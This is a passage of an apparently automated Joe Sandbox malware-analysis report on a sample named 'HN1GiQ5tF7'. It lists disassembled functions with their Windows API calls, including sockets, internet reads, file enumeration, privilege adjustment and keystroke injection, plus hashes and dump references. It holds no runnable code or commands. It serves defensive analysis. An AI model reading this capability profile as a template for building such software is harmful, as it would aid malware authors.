|, xrefs: 0067140C
(, xrefs: 00671422

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: lstrlen
String ID: ($,2n$<2n$|
API String ID: 1659193697-555120333
Opcode ID: 75c7fc75ad2ab9f4dbb9bf4870c3292288fd89943758ebb95cb3055c42c591c3
Instruction ID: 87115ab0e3bc4f110c503b4484ef09e314831b06a324bfd4de4a61ccb57a151c
Opcode Fuzzy Hash: 75c7fc75ad2ab9f4dbb9bf4870c3292288fd89943758ebb95cb3055c42c591c3
Instruction Fuzzy Hash: DD321575A007059FC728CF69C4809AAB7F1FF49310B15C56EE59ADB3A2E770E981CB44

Function 0068923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0068A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0068A84E

socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00689296
WSAGetLastError.WSOCK32(00000000,00000000), ref: 006892B9

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: 1a9937e017352a59ec29cc4ea2b7ef346a81cf198fc6bb19746283439ed1fe4b
Instruction ID: 97cbb16097a6a51b17d8adae45ba6b27c0223d5019cf3be5abc6e745d878de0d
Opcode Fuzzy Hash: 1a9937e017352a59ec29cc4ea2b7ef346a81cf198fc6bb19746283439ed1fe4b
Instruction Fuzzy Hash: 8141E470600500AFDB50BF68C892EBE77EEEF44724F14855CF916AB382DA749E418BA5

Function 0067EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0067EB8A
_wcscmp.LIBCMT ref: 0067EBBA
_wcscmp.LIBCMT ref: 0067EBCF
FindNextFileW.KERNEL32(00000000,?), ref: 0067EBE0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 0067EC0E

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: c7553395f622aea5ddef61af2824f31b8d5fba638ca6f0d1c07ea8d4f5807d8e
Instruction ID: c7b33b6b287746712f8ea03e3dbb047f4025c202ef6cac34ad9df18a6ca6d054
Opcode Fuzzy Hash: c7553395f622aea5ddef61af2824f31b8d5fba638ca6f0d1c07ea8d4f5807d8e
Instruction Fuzzy Hash: EB41C0756003029FC708DF68C490EA9B7E6FF49324F10859DF96A8B3A1DB32A944CB95

Function 00698111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00698160
IsWindowEnabled.USER32 ref: 0069816E
GetForegroundWindow.USER32(?,?,00000001), ref: 0069817B
IsIconic.USER32 ref: 00698189
IsZoomed.USER32 ref: 00698197

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 3681e482880b050fde8d58319f774a0c6453468318927e47f52aab50c1565edb
Instruction ID: ae8cc9b79154a84015a5861ad860b11ede9b86dec309967a9d9ca45af176b96e
Opcode Fuzzy Hash: 3681e482880b050fde8d58319f774a0c6453468318927e47f52aab50c1565edb
Instruction Fuzzy Hash: AF11BF717002126FEB216F26DC44AAFBB9FEF46760F04142DF84AD7241DF34A94286A4

Function 0064E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0064E014,771B0AE0,0064DEF1,006CDC38,?,?), ref: 0064E02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0064E03E

Strings

kernel32.dll, xrefs: 0064E027
GetNativeSystemInfo, xrefs: 0064E038

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: bca4cb18c33deb08561dbee6b978b0b9d0c9c0eeced66f9ad15415090e315786
Instruction ID: 88b3c26fc5a0cc71e1ab8a19b8516176ede548f3b03ad3a902ed4ab3836e67bc
Opcode Fuzzy Hash: bca4cb18c33deb08561dbee6b978b0b9d0c9c0eeced66f9ad15415090e315786
Instruction Fuzzy Hash: 49D0A7B04007239FC7314F65EC0865276DFBF10700F19442AE491D2250FBF4C8C08650

Function 00643B70 Relevance: 5.9, Strings: 4, Instructions: 903COMMON

Download Yara Rule

Strings

o, xrefs: 006440A4
@, xrefs: 00644176
o, xrefs: 006A701F
o, xrefs: 006440EC

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: @$ o$ o$ o
API String ID: 3728558374-1824529586
Opcode ID: 2077e29e74b5f97108bc7098085e11bf0a19bbe3bd8d15246180ff6f24ad0e04
Instruction ID: eaeaffd363e0d82ff9d227c585f36147fa0f0e08b02eb41ef9063155ab9376dc
Opcode Fuzzy Hash: 2077e29e74b5f97108bc7098085e11bf0a19bbe3bd8d15246180ff6f24ad0e04
Instruction Fuzzy Hash: 5C72AD70E042199FCF14EF94C881AEEB7B7EF49310F14805AE909AB351DB71AE46CB95

Function 0064B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON

Download Yara Rule

APIs

Part of subcall function 0064B34E: GetWindowLongW.USER32(?,000000EB), ref: 0064B35F

DefDlgProcW.USER32(?,?,?,?,?), ref: 0064B22F

Part of subcall function 0064B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0064B5A5

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Proc$LongWindow
String ID:
API String ID: 2749884682-0
Opcode ID: 6837cf1c49abe9b314bae47b4c56ac797d4bfb8dd8dbf7146efce1a96b77427a
Instruction ID: da98a655f74187a8dac63f0d143a61cccbabc3ff84cd36a142e7c8132aafb40a
Opcode Fuzzy Hash: 6837cf1c49abe9b314bae47b4c56ac797d4bfb8dd8dbf7146efce1a96b77427a
Instruction Fuzzy Hash: 75A16970114105BADF28BF2ADC88EFF299FEB47340B14611DF402D6A91DB66DE02D676

Function 00684EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,006843BF,00000000), ref: 00684FA6
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00684FD2

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 2af8201c2b41ef426c0204da9a55a1514f52185a0647a1683ebce58e27cec7fc
Instruction ID: ae5ebf20e75f36fe4f06a1346658abac3f241f94f3c521bc6b806f559db3e300
Opcode Fuzzy Hash: 2af8201c2b41ef426c0204da9a55a1514f52185a0647a1683ebce58e27cec7fc
Instruction Fuzzy Hash: 8641E57150420ABFEB21AE80CC85EFF77BEEB80754F10416EF60666281EA719E41D7A4

Function 006377B0 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1076COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00637921

Strings

\Qn, xrefs: 006B1028

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: _memmove
String ID: \Qn
API String ID: 4104443479-2471308940
Opcode ID: 8ddc7c416bba7c7581590561e08cc85e1ed7f4d4b3e73ea8f1c00cd3d90b911e
Instruction ID: a7178d4feb9a28fc390c5f3c0b26a9363fb09cd4ef969fd16bda76529f359326
Opcode Fuzzy Hash: 8ddc7c416bba7c7581590561e08cc85e1ed7f4d4b3e73ea8f1c00cd3d90b911e
Instruction Fuzzy Hash: 4FA24DB0904219DFDB24CF58C4906EDBBB2FF49314F2581A9E859AB391D7349E82DF90

Function 0067E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0067E20D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0067E267
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0067E2B4

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: b3abb41cd87c3ff2421aad826c10a7af5b48fec6061e8ef1f2e1f3686cf1574c
Instruction ID: c2e9ca874fa1e678fa7d9e7a44fff87b0674008f8a6baaca57d5ea01cd08d56d
Opcode Fuzzy Hash: b3abb41cd87c3ff2421aad826c10a7af5b48fec6061e8ef1f2e1f3686cf1574c
Instruction Fuzzy Hash: 93216D75A00218EFCB00EFA5D884AEDFBB9FF48310F1484A9F905AB352DB319945CB54

Function 0066B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0064F4EA: std::exception::exception.LIBCMT ref: 0064F51E
Part of subcall function 0064F4EA: __CxxThrowException@8.LIBCMT ref: 0064F533

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0066B180
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0066B1AD
GetLastError.KERNEL32 ref: 0066B1BA

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 188b6cb9df1c7944eac8f5ab40eda0ad418f880f79c3cb747060b50a6e5e8e1d
Instruction ID: 169dce3981a31faf037c8518b43788c561c725ae99f4ede209d8fa72504141a1
Opcode Fuzzy Hash: 188b6cb9df1c7944eac8f5ab40eda0ad418f880f79c3cb747060b50a6e5e8e1d
Instruction Fuzzy Hash: A71188B2504205BFE728AF64DC86D6BB7FEEB45710B20852EE45697241EB70FC818A60

Function 00676606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00676623
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00676664
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0067666F

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: dce64eb937e02205e644fbdd4ed70ed6fd0992d6dc148ce99deb2659fc45522c
Instruction ID: 62d7aaf0205a6e3c20f214a399b85b7eea65fc1aecae2757b50ac1052634cad8
Opcode Fuzzy Hash: dce64eb937e02205e644fbdd4ed70ed6fd0992d6dc148ce99deb2659fc45522c
Instruction Fuzzy Hash: 59115EB1E01228BFDB108FA9DC44BAEBBFDEB45B10F108152F904E6290D3B05A018BA1

Function 006771FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00677223
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0067723A
FreeSid.ADVAPI32(?), ref: 0067724A

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 35554439426e868e65cb86e71c761ad5ca8ccaf8660dd2939846b427f4381080
Instruction ID: 8438beeb6a0c89ca41b98d51e6ee15727ef41fb7fda6d8e15faa43e7e2f72dae
Opcode Fuzzy Hash: 35554439426e868e65cb86e71c761ad5ca8ccaf8660dd2939846b427f4381080
Instruction Fuzzy Hash: C3F01275904209BFDF04DFE4DD89AEDBBB9EF08201F105569A502E6191E27056848B10

Function 0067F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0067F599
FindClose.KERNEL32(00000000), ref: 0067F5C9

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: e649118134bea8a577819fdefb82a5f5e377e6dcb7ec432d33c8c4ad9b80fded
Instruction ID: f9b5333b67e9abbe9def551031856ad270081188a7253cedcb4f64da16337723
Opcode Fuzzy Hash: e649118134bea8a577819fdefb82a5f5e377e6dcb7ec432d33c8c4ad9b80fded
Instruction Fuzzy Hash: BD1188716006019FD710DF28D845A6EB7EAFF94324F10851DF869DB391DB74AD01CB95

Function 0067CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0068BE6A,?,?,00000000,?), ref: 0067CEA7
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0068BE6A,?,?,00000000,?), ref: 0067CEB9

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 404f74890236c22f222a89551fd772195d04602fe0352b56f655081db54a55c0
Instruction ID: a257850f6d1d446bacccfea26ec10eb5e8a2a17ec6fa3723605c7b6edd136e18
Opcode Fuzzy Hash: 404f74890236c22f222a89551fd772195d04602fe0352b56f655081db54a55c0
Instruction Fuzzy Hash: 73F0A771100329FBDB109FA4DC49FEA776EFF09361F008169F919D6181D7309A44CBA0

Function 0067411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00674153
keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 00674166

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 451dca672652710d56a7b6bad097b81cfcd3434fb75f80f22869a79389a6f93a
Instruction ID: 9d44050fac6067670b609a87283a7b34a0bb0591cbd806cefc06e468693db36f
Opcode Fuzzy Hash: 451dca672652710d56a7b6bad097b81cfcd3434fb75f80f22869a79389a6f93a
Instruction Fuzzy Hash: 3DF06D7180024DAFDB059FA0C809BBE7BB1EF00305F008009F9659A191E7798652DFA0

Function 0066AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0066ACC0), ref: 0066AB99
CloseHandle.KERNEL32(?,?,0066ACC0), ref: 0066ABAB

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: a47d7b141999ea3c34360b87d97b7ed41e566475f8a21b574df4f6b2d6613fda
Instruction ID: 4af40e1d72741cb0a7bf780ecbd6631e760821ed13a7b7843e0681f299fe1417
Opcode Fuzzy Hash: a47d7b141999ea3c34360b87d97b7ed41e566475f8a21b574df4f6b2d6613fda
Instruction Fuzzy Hash: FEE0E675004510AFE7652F54EC05D7777EBEF04320710952DF55985475D7625CD0DB50

Function 006581AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00656DB3,-0000031A,?,?,00000001), ref: 006581B1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 006581BA

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6bdd0c905ea89e34805f638d664aaf07b9cf71e63ba54ff77e02ebed2ecffafc
Instruction ID: fa28427fb2036f590d91263996974aa9730b8c7d0bf8e06d3d286c9ba0fe5e8d
Opcode Fuzzy Hash: 6bdd0c905ea89e34805f638d664aaf07b9cf71e63ba54ff77e02ebed2ecffafc
Instruction Fuzzy Hash: B9B092B1044608FBDB002BA1EC09B587FAAEB0A652F045120F60D88062AB7354908B92

Function 0065D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73f925ece0013b44a5d20576a810399a1b0ceb48cb06ce37dbd7bbaa361366d8
